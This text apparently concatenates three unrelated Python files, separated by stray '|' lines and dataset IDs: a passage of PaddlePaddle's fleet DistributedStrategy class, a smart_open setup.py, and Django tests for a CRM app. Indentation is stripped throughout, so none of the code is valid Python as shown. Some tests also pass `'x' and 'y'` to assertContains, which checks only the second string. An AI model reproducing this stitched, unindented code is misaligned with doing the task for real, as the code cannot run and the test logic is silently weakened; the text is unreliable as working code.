"""
return self.strategy.find_unused_parameters
@find_unused_parameters.setter
@is_strict_auto
def find_unused_parameters(self, flag):
if isinstance(flag, bool):
self.strategy.find_unused_parameters = flag
else:
print(
"WARNING: find_unused_parameters should have value of bool type")
@property
def _fuse_grad_size_in_TFLOPS(self):
return self.strategy.fuse_grad_size_in_TFLOPS
@_fuse_grad_size_in_TFLOPS.setter
@is_strict_auto
def _fuse_grad_size_in_TFLOPS(self, value):
if isinstance(value, float):
self.strategy.fuse_grad_size_in_TFLOPS = value
else:
print(
"WARNING: fuse_grad_size_in_TFLOPS should have value of float type"
)
@property
def nccl_comm_num(self):
"""
        Specifying the number of NCCL communicators
Default value: 1
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.nccl_comm_num = 2
"""
return self.strategy.nccl_comm_num
@nccl_comm_num.setter
@is_strict_auto
def nccl_comm_num(self, value):
if isinstance(value, int):
self.strategy.nccl_comm_num = value
else:
print("WARNING: nccl_comm_num should have value of int type")
@recompute.setter
@is_strict_auto
def recompute(self, flag):
if isinstance(flag, bool):
self.strategy.recompute = flag
else:
print("WARNING: recompute should have value of bool type")
@property
def recompute_configs(self):
"""
Set recompute configurations.
**Note**:
            checkpoints(list): list of string names of checkpoints. In general, the current
            implementation of the recompute strategy requires manually assigned checkpoints.
            enable_offload(bool): enable the recompute-checkpoint offload feature. This feature
            offloads the checkpoints to host memory to allow an even larger batch size. Since
            the memcpy from host to device takes time, it is a trade-off between a larger batch
            size and training speed.
            checkpoint_shape(list): list of ints that specifies the shape of the checkpoints. So far,
            recompute-offload requires all checkpoints to have the same shape, and every dimension
            specified here must be determined ("-1" is not allowed).
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.recompute = True
strategy.recompute_configs = {
"checkpoints": ["x", "y"],
"enable_offload": True,
"checkpoint_shape": [100, 512, 1024] }
"""
return get_msg_dict(self.strategy.recompute_configs)
@recompute_configs.setter
@is_strict_auto
def recompute_configs(self, configs):
check_configs_key(self.strategy.recompute_configs, configs,
"checkpoint_configs")
assign_configs_value(self.strategy.recompute_configs, configs)
@property
def sharding(self):
"""
Indicating whether we are using sharding Optimizer for memory
optimization. We implement the sharding optimizer following the ZeRO-DP
idea from [ZeRO: Memory Optimizations Toward Training Trillion Parameter Models](https://arxiv.org/abs/1910.02054).
        Model parameters and optimizer state are sharded across different ranks, allowing larger models to fit.
Default value: False
Examples:
.. code-block:: python
            import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.sharding = True
"""
return self.strategy.sharding
@sharding.setter
@is_strict_auto
def sharding(self, flag):
if isinstance(flag, bool):
self.strategy.sharding = flag
else:
print("WARNING: sharding should have value of bool type")
@property
def sharding_configs(self):
"""
Set sharding configurations.
**Note**:
            fuse_broadcast_MB(float): size of a fused group of broadcast parameters.
            This configuration will affect the communication speed in sharding training,
            and should be an empirical value decided by your model size and network topology.
            hybrid_dp(bool): enable hybrid data parallelism on top of sharding parallelism.
            You are supposed to have at least double the number of GPUs used in normal sharding
            training to enable this feature.
            sharding_group_size(int): attribute of hybrid_dp. Specifies the number of GPUs within
            each sharding group; therefore, the number of hybrid data parallelism ways will be equal
            to (global_size / sharding_group_size).
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.sharding = True
strategy.sharding_configs = {
"fuse_broadcast_MB": 32,
"hybrid_dp": True,
"sharding_group_size": 8}
"""
return get_msg_dict(self.strategy.sharding_configs)
@sharding_configs.setter
@is_strict_auto
def sharding_configs(self, configs):
check_configs_key(self.strategy.sharding_configs, configs,
"sharding_configs")
assign_configs_value(self.strategy.sharding_configs, configs)
@property
def pipeline(self):
"""
Indicating whether we are using pipeline parallelism for distributed training.
        The current implementation mainly focuses on pipeline parallelism within a single GPU machine and
        data parallelism across GPU machines. The pipeline information is indicated through
        device_guard information in the user-defined program.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.pipeline = True
"""
return self.strategy.pipeline
@pipeline.setter
@is_strict_auto
def pipeline(self, flag):
if isinstance(flag, bool):
self.strategy.pipeline = flag
else:
print("WARNING: pipeline should have value of bool type")
@property
def pipeline_configs(self):
"""
Set pipeline parallelism configurations. In pipeline parallelism,
        different parts of neural networks run on different GPUs.
        There are Tensor queue buffers between each pair of neighboring GPUs
        that are responsible for synchronizing hidden Tensor results between
        GPUs. Pipeline parallelism consists of several producer-consumer style
        hardware pairs, such as GPU-GPU, CPU-GPU, GPU-XPU. The best way to speed up
        pipeline parallelism is to make the size of the Tensors in the Tensor queue smaller,
        so that we have a faster producer for downstream consumers.
**Notes**:
**Detailed arguments for pipeline_configs**
**micro_batch**: the number of small batches in each user defined batch
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.pipeline = True
strategy.pipeline_configs = {"micro_batch": 12}
"""
return get_msg_dict(self.strategy.pipeline_configs)
@pipeline_configs.setter
@is_strict_auto
def pipeline_configs(self, configs):
check_configs_key(self.strategy.pipeline_configs, configs,
"pipeline_configs")
assign_configs_value(self.strategy.pipeline_configs, configs)
@property
def hybrid_configs(self):
"""
Dynamic graph hybrid parallel strategy configuration. Three-way hybrid parallelism
needs to meet the following relationships
total_number_GPUs = dp_degree * mp_degree * pp_degree
**Note**:
dp_degree(int): set number of GPUs in a data parallel group. Default -1.
This value should be an integer greater than 0.
If it is not set, or set to -1, its value will be inferred
based on the total number of cards.
mp_degree(int): set number of GPUs in a model parallel group. Default 1
pp_degree(int): set number of GPUs in a pipeline parallel group. Default 1
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.hybrid_configs = {
"dp_degree": 1,
"mp_degree": 2,
"pp_degree": 1}
"""
return get_msg_dict(self.strategy.hybrid_configs)
@hybrid_configs.setter
def hybrid_configs(self, configs):
check_configs_key(self.strategy.hybrid_configs, configs,
"hybrid_configs")
assign_configs_value(self.strategy.hybrid_configs, configs)
@property
def localsgd(self):
"""
Indicating whether we are using Local SGD training. Default Value: False
For more details, please refer to
`Don't Use Large Mini-Batches, Use Local SGD <https://arxiv.org/pdf/1808.07217.pdf>`_.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.localsgd = True # by default this is false
"""
return self.strategy.localsgd
@localsgd.setter
@is_strict_auto
def localsgd(self, flag):
if isinstance(flag, bool):
self.strategy.localsgd = flag
else:
print("WARNING: localsgd should have value of bool type")
@property
def localsgd_configs(self):
"""
Set LocalSGD training configurations. LocalSGD has a configurable
setting that can be configured through a dict.
**Notes**:
            k_steps(int): The local steps for training before parameter synchronization. Default 1.
            begin_step(int): The step at which to begin training with localsgd. Default 1.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.localsgd = True
strategy.localsgd_configs = {"k_steps": 4,
"begin_step": 30}
"""
return get_msg_dict(self.strategy.localsgd_configs)
@localsgd_configs.setter
@is_strict_auto
def localsgd_configs(self, configs):
check_configs_key(self.strategy.localsgd_configs, configs,
"localsgd_configs")
assign_configs_value(self.strategy.localsgd_configs, configs)
@property
def adaptive_localsgd(self):
"""
Indicating whether we are using Adaptive Local SGD training. Default Value: False
For more details, please refer to `Adaptive Communication Strategies to Achieve
the Best Error-Runtime Trade-off in Local-Update SGD <https://arxiv.org/pdf/1810.08313.pdf>`_.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.adaptive_localsgd = True # by default this is false
"""
return self.strategy.adaptive_localsgd
@adaptive_localsgd.setter
@is_strict_auto
def adaptive_localsgd(self, flag):
if isinstance(flag, bool):
self.strategy.adaptive_localsgd = flag
else:
print("WARNING: adaptive_localsgd should have value of bool type")
@property
def adaptive_localsgd_configs(self):
"""
Set AdaptiveLocalSGD training configurations. AdaptiveLocalSGD has a configurable
setting that can be configured through a dict.
**Notes**:
            init_k_steps(int): The initial steps for training before adaptive localsgd.
            Then, the adaptive localsgd method will modify init_k_steps automatically.
            Default 1.
            begin_step(int): The step at which to begin training with adaptive localsgd. Default 1.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.adaptive_localsgd = True
strategy.adaptive_localsgd_configs = {"init_k_steps": 1,
"begin_step": 30}
"""
return get_msg_dict(self.strategy.adaptive_localsgd_configs)
@adaptive_localsgd_configs.setter
@is_strict_auto
def adaptive_localsgd_configs(self, configs):
check_configs_key(self.strategy.adaptive_localsgd_configs, configs,
"adaptive_localsgd_configs")
assign_configs_value(self.strategy.adaptive_localsgd_configs, configs)
@property
def dgc(self):
"""
Indicating whether we are using Deep Gradient Compression training. For more details, please refer to
[Deep Gradient Compression](https://arxiv.org/abs/1712.01887).
Default Value: False
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.dgc = True # by default this is false
"""
return self.strategy.dgc
@dgc.setter
@is_strict_auto
def dgc(self, flag):
if isinstance(flag, bool):
self.strategy.dgc = flag
else:
print("WARNING: dgc should have value of bool type")
@property
def dgc_configs(self):
r"""
        Set Deep Gradient Compression training configurations. In general, dgc has several configurable
        settings that can be configured through a dict.
**Notes**:
rampup_begin_step(int): The beginning step from which gradient compression is implemented. Default 0.
rampup_step(int): Time steps used in sparsity warm-up periods. Default is 1. \
For example, if the sparsity is [0.75, 0.9375, 0.984375, 0.996, 0.999], and the rampup_step is 100, \
            it will use 0.75 at steps 0~19, 0.9375 at steps 20~39, and so on. When the end of the sparsity array \
            is reached, it will use 0.999 from then on.
            sparsity(list[float]): Get the top important elements from the gradient tensor; the ratio is (1 - sparsity). \
            Default is [0.999]. For example, if the sparsity is [0.99, 0.999], the top [1%, 0.1%] important \
            elements will be transmitted.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.dgc = True
strategy.dgc_configs = {"rampup_begin_step": 1252}
"""
return get_msg_dict(self.strategy.dgc_configs)
@dgc_configs.setter
@is_strict_auto
def dgc_configs(self, configs):
check_configs_key(self.strategy.dgc_configs, configs, "dgc_configs")
assign_configs_value(self.strategy.dgc_configs, configs)
@property
def fp16_allreduce(self):
"""
Indicating whether we are using fp16 gradient allreduce training
Default Value: False
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.fp16_allreduce = True # by default this is false
"""
return self.strategy.fp16_allreduce
@fp16_allreduce.setter
@is_strict_auto
def fp16_allreduce(self, flag):
if not isinstance(flag, bool):
raise TypeError('fp16_allreduce must be value of bool type')
self.strategy.fp16_allreduce = flag
@property
def gradient_merge(self):
"""
        Gradient Merge, also called Gradient Accumulation,
is a strategy for large batch training. With this strategy,
model parameter will not be updated until user-defined steps.
For each step, the forward network and the backward network
will run to calculate the gradient of model parameters.
For every k step, the optimization network will run,
applying a specific optimization method (such as SGD, Adam)
to model parameters.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.gradient_merge = True
strategy.gradient_merge_configs = {"k_steps": 4, "avg": True}
"""
return self.strategy.gradient_merge
@gradient_merge.setter
@is_strict_auto
def gradient_merge(self, flag):
if isinstance(flag, bool):
self.strategy.gradient_merge = flag
else:
print("WARNING: gradient_merge should have value of bool type")
@property
def gradient_merge_configs(self):
"""
        The key-value configs of gradient merge in DistributedStrategy.
**Note**:
k_steps(int): the update period of the parameters.
avg(bool): whether to average the gradients of each mini-batch, the default value is `True`
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.gradient_merge = True
strategy.gradient_merge_configs = {"k_steps": 4, "avg": True}
"""
return get_msg_dict(self.strategy.gradient_merge_configs)
@gradient_merge_configs.setter
@is_strict_auto
def gradient_merge_configs(self, configs):
check_configs_key(self.strategy.gradient_merge_configs, configs,
"gradient_configs")
assign_configs_value(self.strategy.gradient_merge_configs, configs)
@property
def lars(self):
"""
Set lars configurations. lars is used to deal with the convergence problems when the global
batch size is larger than 8k. For more details, please refer to
[Large Batch Training of Convolutional Networks](https://arxiv.org/abs/1708.03888).
Default Value: False
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.lars = True # by default this is false
"""
return self.strategy.lars
@lars.setter
@is_strict_auto
def lars(self, flag):
if isinstance(flag, bool):
self.strategy.lars = flag
else:
print("WARNING: lars should have value of bool type")
@property
def lars_configs(self):
"""
Set Lars training configurations.
**Notes**:
**lars_coeff (float)**: trust ratio in lars formula.
**lars_weight_decay** (float): weight decay coefficient in lars formula.
            **epsilon (float)**: argument used to avoid potential division-by-zero
            when computing the local lr;
            **exclude_from_weight_decay ([string])**: a list of name strings of layers which
            will be excluded from weight decay in the lars formula.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.lars = True
strategy.lars_configs = {
"lars_coeff": 0.01,
"lars_weight_decay": 0.0005,
"epsilon": 0,
"exclude_from_weight_decay": ['batch_norm', '.b_0']
}
"""
return get_msg_dict(self.strategy.lars_configs)
@lars_configs.setter
@is_strict_auto
def lars_configs(self, configs):
check_configs_key(self.strategy.lars_configs, configs, "lars_configs")
assign_configs_value(self.strategy.lars_configs, configs)
@property
def lamb(self):
"""
Set lamb configurations. lamb is used to deal with the convergence problems for large
        batch size training, especially for attention-related models like BERT. For more details,
please refer to
[Large Batch Optimization for Deep Learning: Training BERT in 76 minutes](https://arxiv.org/abs/1904.00962).
Default Value: False
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.lamb = True # by default this is false
"""
return self.strategy.lamb
@lamb.setter
@is_strict_auto
def lamb(self, flag):
if isinstance(flag, bool):
self.strategy.lamb = flag
else:
print("WARNING: lamb should have value of bool type")
@property
def lamb_configs(self):
"""
        Set Lamb training configurations.
**Notes**:
**lamb_weight_decay** (float): weight decay coefficient in lamb formula.
            **exclude_from_weight_decay ([string])**: a list of name strings of layers which
            will be excluded from weight decay in the lamb formula.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.lamb = True
strategy.lamb_configs = {
'lamb_weight_decay': 0.01,
'exclude_from_weight_decay': [],
}
"""
return get_msg_dict(self.strategy.lamb_configs)
@lamb_configs.setter
@is_strict_auto
def lamb_configs(self, configs):
check_configs_key(self.strategy.lamb_configs, configs, "lamb_configs")
assign_configs_value(self.strategy.lamb_configs, configs)
@property
def elastic(self):
"""
Indicating whether we want to do current distributed training on clusters with elastic resources.
        Currently, this configuration is not valid.
"""
return self.strategy.elastic
@elastic.setter
@is_strict_auto
def elastic(self, flag):
if isinstance(flag, bool):
self.strategy.elastic = flag
else:
print("WARNING: elastic should have value of bool type")
@property
def auto(self):
"""
Indicating whether we are using auto-parallel configuration
        This is currently an experimental feature. Auto-parallelism can be used
        only when a user does not set any other strategy config except auto.
        For details, please refer to the following code example.
Default Value: False
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.auto = True
# if set other strategy at the same time, auto will not apply
# strategy.amp = True
optimizer = paddle.optimizer.SGD(learning_rate=0.01)
optimizer = fleet.distributed_optimizer(optimizer, strategy)
"""
return self.strategy.auto
@auto.setter
def auto(self, flag):
if isinstance(flag, bool):
self.strategy.auto = flag
else:
print("WARNING: auto should have value of bool type")
@property
def cudnn_exhaustive_search(self):
"""
Indicating whether to use exhaustive search method to choose convolution algorithms.
Exhaustive search attempts all cuDNN algorithms to choose the fastest algorithm.
        This method is time-consuming; the chosen algorithm will be cached for the given layer specifications.
Once the layer specifications (like batch size, feature map size) are changed, it will search again.
Default Value: True
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.cudnn_exhaustive_search = False
optimizer = paddle.optimizer.SGD(learning_rate=0.01)
optimizer = fleet.distributed_optimizer(optimizer, strategy)
"""
return self.strategy.cudnn_exhaustive_search
@cudnn_exhaustive_search.setter
@is_strict_auto
def cudnn_exhaustive_search(self, flag):
if isinstance(flag, bool):
self.strategy.cudnn_exhaustive_search = flag
else:
print(
"WARNING: cudnn_exhaustive_search should have value of bool type"
)
@property
def conv_workspace_size_limit(self):
"""
The workspace limit size in MB unit for choosing cuDNN convolution algorithms.
        The inner function of cuDNN obtains the fastest suitable algorithm that fits within this memory limit.
        Usually, a larger workspace size may allow faster algorithms to be chosen,
        but it significantly increases the memory workspace. Users need to trade off between memory and speed.
Default Value: 4000
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.conv_workspace_size_limit = 1024
optimizer = paddle.optimizer.SGD(learning_rate=0.01)
optimizer = fleet.distributed_optimizer(optimizer, strategy)
"""
return self.strategy.conv_workspace_size_limit
@conv_workspace_size_limit.setter
@is_strict_auto
def conv_workspace_size_limit(self, value):
if isinstance(value, int):
self.strategy.conv_workspace_size_limit = value
else:
print(
"WARNING: conv_workspace_size_limit should have value of int type"
)
@property
def cudnn_batchnorm_spatial_persistent(self):
"""
        Indicates whether to use the CUDNN_BATCHNORM_SPATIAL_PERSISTENT mode in batchnorm.
This is only useful in cudnn.
Default Value: True
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.cudnn_batchnorm_spatial_persistent = True
optimizer = paddle.optimizer.SGD(learning_rate=0.01)
optimizer = fleet.distributed_optimizer(optimizer, strategy)
"""
return self.strategy.cudnn_batchnorm_spatial_persistent
@cudnn_batchnorm_spatial_persistent.setter
@is_strict_auto
def cudnn_batchnorm_spatial_persistent(self, flag):
if isinstance(flag, bool):
self.strategy.cudnn_batchnorm_spatial_persistent = flag
else:
print(
"WARNING: cudnn_batchnorm_spatial_persistent should have value of bool type"
)
def _enable_env(self):
strategy = self.strategy
keys = [
"FLAGS_cudnn_batchnorm_spatial_persistent",
"FLAGS_conv_workspace_size_limit",
"FLAGS_cudnn_exhaustive_search",
"FLAGS_sync_nccl_allreduce",
"FLAGS_fuse_parameter_memory_size",
"FLAGS_fuse_parameter_groups_size",
]
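        # NOTE: the values list below is matched positionally to the FLAGS keys above;
        # in particular, fuse_grad_size_in_MB feeds FLAGS_fuse_parameter_memory_size and
        # fuse_grad_size_in_TFLOPS feeds FLAGS_fuse_parameter_groups_size.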
values = [
bool(strategy.cudnn_batchnorm_spatial_persistent),
int(strategy.conv_workspace_size_limit),
bool(strategy.cudnn_exhaustive_search),
bool(strategy.sync_nccl_allreduce),
int(strategy.fuse_grad_size_in_MB),
int(strategy.fuse_grad_size_in_TFLOPS),
]
for i, key in enumerate(keys):
if core.globals().is_public(key):
core.globals()[key] = values[i]
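    # _is_strict_auto: returns True only when `auto` is enabled and no other strategy
    # attribute has been explicitly set (tracked by the module-level non_auto_func_called flag).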
def _is_strict_auto(self):
global non_auto_func_called
if self.strategy.auto and non_auto_func_called:
return True
return False
def __repr__(self):
spacing = 2
max_k = 38
max_v = 38
length = max_k + max_v + spacing
h1_format = " " + "|{{:^{}s}}|\n".format(length)
h2_format = " " + "|{{:>{}s}}{}{{:^{}s}}|\n".format(max_k, " " *
spacing, max_v)
border = " +" + "".join(["="] * length) + "+"
line = " +" + "".join(["-"] * length) + "+"
draws = border + "\n"
draws += h1_format.format("")
draws += h1_format.format("DistributedStrategy Overview")
draws += h1_format.format("")
fields = self.strategy.DESCRIPTOR.fields
str_res = ""
env_draws = line + "\n"
for f in fields:
if "build_strategy" in f.name or "execution_strategy" in f.name:
continue
if "_configs" in f.name:
continue
else:
if isinstance(getattr(self.strategy, f.name), bool):
if hasattr(self.strategy, f.name + "_configs"):
if getattr(self.strategy, f.name):
draws += border + "\n"
draws += h1_format.format(
"{}=True <-> {}_configs".format(f.name, f.name))
draws += line + "\n"
my_configs = getattr(self.strategy,
f.name + "_configs")
config_fields = my_configs.DESCRIPTOR.fields
for ff in config_fields:
if isinstance(
getattr(my_configs, ff.name),
google.protobuf.pyext._message.
RepeatedScalarContainer):
values = getattr(my_configs, ff.name)
for i, v in enumerate(values):
if i == 0:
draws += h2_format.format(ff.name,
str(v))
else:
draws += h2_format.format("",
str(v))
else:
draws += h2_format.format(
ff.name,
str(getattr(my_configs, ff.name)))
else:
env_draws += h2_format.format(
f.name, str(getattr(self.strategy, f.name)))
else:
env_draws += h2_format.format(
f.name, str(getattr(self.strategy, f.name)))
result_res = draws + border + "\n" + h1_format.format(
"Environment Flags, Communication Flags")
result_res += env_draws
build_strategy_str = border + "\n"
build_strategy_str += h1_format.format("Build Strategy")
build_strategy_str += line + "\n"
fields = self.strategy.build_strategy.DESCRIPTOR.fields
for f in fields:
build_strategy_str += h2_format.format(
f.name, str(getattr(self.strategy.build_strategy, f.name)))
build_strategy_str += border + "\n"
execution_strategy_str = h1_format.format("Execution Strategy")
execution_strategy_str += line + "\n"
fields = self.strategy.execution_strategy.DESCRIPTOR.fields
for f in fields:
execution_strategy_str += h2_format.format(
f.name, str(getattr(self.strategy.execution_strategy, f.name)))
execution_strategy_str += border + "\n"
result_res += build_strategy_str + execution_strategy_str
return result_res
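# Usage sketch (mirrors the docstring examples above): the individual switches are set on one
# DistributedStrategy instance and then handed to fleet.distributed_optimizer, e.g.
#
#     import paddle
#     import paddle.distributed.fleet as fleet
#     strategy = fleet.DistributedStrategy()
#     strategy.amp = True
#     strategy.recompute = True
#     strategy.recompute_configs = {"checkpoints": ["x", "y"]}
#     optimizer = paddle.optimizer.SGD(learning_rate=0.01)
#     optimizer = fleet.distributed_optimizer(optimizer, strategy)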
|
the-stack_106_19046
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015 Radim Rehurek <[email protected]>
#
# This code is distributed under the terms and conditions
# from the MIT License (MIT).
import io
import os
from setuptools import setup, find_packages
def read(fname):
return io.open(os.path.join(os.path.dirname(__file__), fname), encoding='utf-8').read()
tests_require = [
'mock',
'moto==0.4.31',
'pathlib2',
'responses',
]
setup(
name='smart_open',
version='1.6.0',
description='Utils for streaming large files (S3, HDFS, gzip, bz2...)',
long_description=read('README.rst'),
packages=find_packages(),
package_data={"smart_open.tests": ["test_data/*gz"]},
author='Radim Rehurek',
author_email='[email protected]',
maintainer='Radim Rehurek',
maintainer_email='[email protected]',
url='https://github.com/piskvorky/smart_open',
download_url='http://pypi.python.org/pypi/smart_open',
keywords='file streaming, s3, hdfs',
license='MIT',
platforms='any',
install_requires=[
'boto >= 2.32',
'bz2file',
'requests',
'boto3'
],
tests_require=tests_require,
extras_require={
'test': tests_require,
},
test_suite="smart_open.tests",
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: System :: Distributed Computing',
'Topic :: Database :: Front-Ends',
],
)
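# Usage sketch (based on the declarations above): `pip install .[test]` pulls in the
# tests_require packages through the "test" extra, and `python setup.py test` runs the
# "smart_open.tests" suite configured via test_suite.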
|
the-stack_106_19047
|
from http import HTTPStatus
from django.contrib.auth import get_user_model
from django.test import Client, TestCase
from django.urls import reverse
from accounts.models import ClientProfile
from config import settings
from crm.models import Request
User = get_user_model()
class CrmPagesTests(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.user_repair = User.objects.create_user(
first_name='Виктория', last_name='Аксентий', username='vika')
cls.user_repair.profile.role = settings.REPAIR_SPECIALIST
cls.new_client = ClientProfile.objects.create(
first_name='Виктория', last_name='Аксентий'
)
cls.user_role_isuser = User.objects.create_user(
first_name='Петя', last_name='Иванов', username='petya')
cls.request = Request.objects.create(
subject=settings.REPAIR,
first_name='Алла',
last_name='Иванова',
telegram='1122638601',
notifications=True,
description='Текст заявки')
cls.url_names = [
reverse('dashboard'),
reverse('profile_update'),
reverse('profile'),
reverse('clients'),
reverse('new_client'),
reverse(
'client_profile', kwargs={'pk': CrmPagesTests.new_client.pk}
),
reverse(
'client_profile_update',
kwargs={'pk': CrmPagesTests.new_client.pk}
),
reverse('colleagues'),
reverse('requests'),
reverse('new_request'),
reverse(
'request_detail', kwargs={'pk': CrmPagesTests.request.pk}
),
reverse(
'request_update', kwargs={'pk': CrmPagesTests.request.pk}
),
]
def setUp(self):
self.user_auth = Client()
self.user_auth.force_login(CrmPagesTests.user_repair)
self.user_role_isuser = Client()
self.user_role_isuser.force_login(CrmPagesTests.user_role_isuser)
def test_pages_uses_correct_template(self):
templates_url_names = {
'index.html': reverse('index'),
'home.html': reverse('home'),
'crm/dashboard.html': reverse('dashboard'),
'crm/profile_update.html': reverse('profile_update'),
'crm/profile.html': reverse('profile'),
'crm/clients_list.html': reverse('clients'),
'crm/new_client.html': reverse('new_client'),
'crm/client_profile.html': reverse(
'client_profile', kwargs={'pk': CrmPagesTests.new_client.pk}
),
'crm/client_profile_update.html': reverse(
'client_profile_update',
kwargs={'pk': CrmPagesTests.new_client.pk}
),
'crm/colleagues_list.html': reverse('colleagues'),
'clients/create_request.html': reverse('client_send_request'),
'crm/requests.html': reverse('requests'),
'crm/new_request.html': reverse('new_request'),
'crm/request_detail.html': reverse(
'request_detail', kwargs={'pk': CrmPagesTests.request.pk}
),
'crm/request_update.html': reverse(
'request_update', kwargs={'pk': CrmPagesTests.request.pk}
),
}
for template, url in templates_url_names.items():
with self.subTest(url=url):
response = self.user_auth.get(url)
self.assertTemplateUsed(response, template)
def test_not_auth_user_not_access_pages(self):
for url in CrmPagesTests.url_names:
with self.subTest(url=url):
response = self.client.get(url)
self.assertEqual(response.status_code, HTTPStatus.FOUND)
def test_auth_user_role_isuser_not_access_pages(self):
for url in CrmPagesTests.url_names:
with self.subTest(url=url):
response = self.user_role_isuser.get(url)
self.assertEqual(response.status_code, HTTPStatus.FORBIDDEN)
def test_new_request_appears_on_pages(self):
url_pages = (
reverse('dashboard'),
reverse('requests')
)
for url in url_pages:
with self.subTest(value=url):
response = self.user_auth.get(url)
self.assertContains(
response,
f'{CrmPagesTests.request.first_name} '
f'{CrmPagesTests.request.last_name}'
)
def test_update_status_request(self):
form_data = {'status': settings.WORK}
self.user_auth.post(
reverse(
'request_update',
kwargs={'pk': CrmPagesTests.request.pk}),
data=form_data,
follow=True
)
response = self.user_auth.get(
reverse(
'request_detail',
kwargs={'pk': CrmPagesTests.request.pk})
)
request_object = response.context['request']
        self.assertEqual(request_object.status, 'work')
def test_delete_request(self):
self.user_auth.post(
reverse(
'request_delete',
kwargs={'pk': CrmPagesTests.request.pk}))
response = self.user_auth.get(
reverse(
'request_detail',
kwargs={'pk': CrmPagesTests.request.pk})
)
self.assertEqual(response.status_code, HTTPStatus.NOT_FOUND)
self.assertFalse(
Request.objects.filter(
id=CrmPagesTests.request.id).exists()
)
def test_page_dashboard_filtering_requests_type_and_status(self):
request_repair = Request.objects.create(
subject=settings.REPAIR,
first_name='Ирина',
last_name='Иванова',
status=settings.OPEN
)
request_service = Request.objects.create(
subject=settings.SERVICE,
first_name='Виктория',
last_name='Бухун',
status=settings.CLOSE
)
subject = 'repair'
status = 'open'
response = self.user_auth.get(
f'/dashboard/?subject={subject}&status={status}'
)
self.assertContains(
response,
f'{request_repair.first_name} {request_repair.last_name}'
)
self.assertNotContains(
response,
f'{request_service.first_name} {request_service.last_name}'
)
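    # The dashboard filter is expected to accept repeated query parameters: passing `status`
    # twice in the querystring (as built below) should return requests matching either status.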
def test_page_dashboard_filtering_requests_two_statuses(self):
request_repair = Request.objects.create(
subject=settings.REPAIR,
first_name='Ирина',
last_name='Иванова',
status=settings.OPEN
)
request_consult = Request.objects.create(
subject=settings.CONSULTATION,
first_name='Жанна',
last_name='Грачева',
status=settings.WORK
)
request_service = Request.objects.create(
subject=settings.SERVICE,
first_name='Виктория',
last_name='Бухун',
status=settings.CLOSE
)
status = 'open'
status_2 = 'work'
response = self.user_auth.get(
f'/dashboard/?status={status}&status={status_2}'
)
self.assertContains(
response,
f'{request_repair.first_name} {request_repair.last_name}' and
f'{request_consult.first_name} {request_consult.last_name}'
)
self.assertNotContains(
response,
f'{request_service.first_name} {request_service.last_name}'
)
def test_page_requests_only_accordance_with_employee_position(self):
request_repair = Request.objects.create(
subject=settings.REPAIR,
first_name='Ирина',
last_name='Иванова',
status=settings.OPEN
)
request_repair_2 = Request.objects.create(
subject=settings.REPAIR,
first_name='Жанна',
last_name='Грачева',
status=settings.WORK
)
request_service = Request.objects.create(
subject=settings.SERVICE,
first_name='Виктория',
last_name='Бухун',
status=settings.CLOSE
)
response = self.user_auth.get(reverse('requests'))
self.assertContains(
response,
f'{request_repair.first_name} {request_repair.last_name}' and
f'{request_repair_2.first_name} {request_repair_2.last_name}'
)
self.assertNotContains(
response,
f'{request_service.first_name} {request_service.last_name}'
)
def test_page_clients_new_client_appears_on_pages(self):
response = self.user_auth.get(reverse('clients'))
self.assertContains(
response,
f'{CrmPagesTests.new_client.first_name} '
f'{CrmPagesTests.new_client.last_name}'
)
self.assertTrue(
ClientProfile.objects.filter(
id=CrmPagesTests.new_client.id).exists()
)
def test_update_client_profile(self):
form_data = {
'email': '[email protected]',
'phone': '89998880088'
}
self.user_auth.post(
reverse(
'client_profile_update',
kwargs={'pk': CrmPagesTests.new_client.pk}),
data=form_data,
follow=True
)
